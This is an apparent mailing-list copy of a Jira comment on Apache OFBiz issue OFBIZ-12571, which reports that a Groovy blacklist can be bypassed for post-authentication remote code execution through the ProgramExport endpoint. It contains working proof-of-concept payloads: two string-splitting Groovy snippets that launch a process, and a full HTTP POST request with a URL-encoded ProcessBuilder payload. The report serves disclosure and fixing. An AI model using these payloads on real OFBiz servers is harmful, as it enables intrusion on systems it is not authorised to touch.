ProgramExport

Y4er (Jira) Thu, 10 Feb 2022 17:03:05 -0800


    [ 
https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490593#comment-17490593
 ]


Y4er commented on OFBIZ-12571:
------------------------------

Simply adding a blacklist can't solve the fundamental problem. Judging from the 
current blacklist after the repair

[https://github.com/apache/ofbiz-framework/commit/f2cf262cf56df86612971bf4dac82795c1e3a512#diff-5d4b97fff9ee1d57e4c1d8274847e196ba5404f367afb3e39025f583a3e95e1aR252]

 

there are still many ways to rce. for example

 
{code:java}
example 1
def strings = new ArrayList<String>();
strings.add("calc")
def instance = Class.forName("java.lang.Pr" + 
"ocessBuilder").getDeclaredConstructor(List.class).newInstance(strings)
def method = instance.getClass().getDeclaredMethod("start", null)
method.invoke(instance,null)  

example 2
evaluate("Proces"+"sBuilder.newInstance(\"calc\").start()") {code}
Given the flexibility of the groovy language, we cannot fix this vulnerability 
just by strings blacklisting, because there are always multiple unknown 
bypasses.

Perhaps the groovy sandbox should be considered to handle this.

> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; 
> webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

[jira] [Commented] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

Reply via email to